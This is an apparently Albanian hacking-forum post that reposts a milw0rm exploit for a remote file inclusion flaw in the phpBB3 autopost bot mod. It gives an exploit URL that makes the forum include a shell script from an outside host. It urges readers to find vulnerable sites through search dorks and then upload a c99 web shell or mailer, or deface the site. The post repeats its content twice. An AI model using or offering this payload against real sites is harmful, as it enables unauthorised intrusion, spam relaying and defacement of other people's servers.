phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability [~] Author : Kacper
Faqja 1 e 1
phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability [~] Author : Kacper
Remote FIle Include Vulnerability ne phpBB3 tek autopost .
Kjo RFI nuk punon ne php5 ose ne ndonje version me te ri .
Kerkoni ndonje web qe e ka ket komponent , dork gjejeni vet .
/forum_path/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=www.khg-cr3w.org/shelli.txt??
forum_path - Dmth ky osht path -i i forumit , munet me qen forum , board , nvaret qysh ja len admini .
functions_lastrss_autopost.php , dmth kjo eshte komponenti i cili eshte Vulnerability .
Pasi te jeni lishur ne shell , mundeni me bo qfar te doni me uplaod ndonje shell c99.php , ose ndonje mailer , apo edhe deface mundeni me bo :-)
# milw0rm.com [2009-02-20]
Kjo RFI nuk punon ne php5 ose ne ndonje version me te ri .
Kerkoni ndonje web qe e ka ket komponent , dork gjejeni vet .
/forum_path/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=www.khg-cr3w.org/shelli.txt??
forum_path - Dmth ky osht path -i i forumit , munet me qen forum , board , nvaret qysh ja len admini .
functions_lastrss_autopost.php , dmth kjo eshte komponenti i cili eshte Vulnerability .
Pasi te jeni lishur ne shell , mundeni me bo qfar te doni me uplaod ndonje shell c99.php , ose ndonje mailer , apo edhe deface mundeni me bo :-)
# milw0rm.com [2009-02-20]
σт¢нєє™- Super Moderator
- Postimet : 696
Points : 570383
Join date : 26/04/2009
Similar topics
» WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities
» The kroax php_fusion Remote SQL-injection.
» zFeeder 1.6 (admin.php) No Authentication Vulnerability
» CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
» PHP-NUKE module Reviews2 (id) SQL injetion vulnerability
» The kroax php_fusion Remote SQL-injection.
» zFeeder 1.6 (admin.php) No Authentication Vulnerability
» CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
» PHP-NUKE module Reviews2 (id) SQL injetion vulnerability
Faqja 1 e 1
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi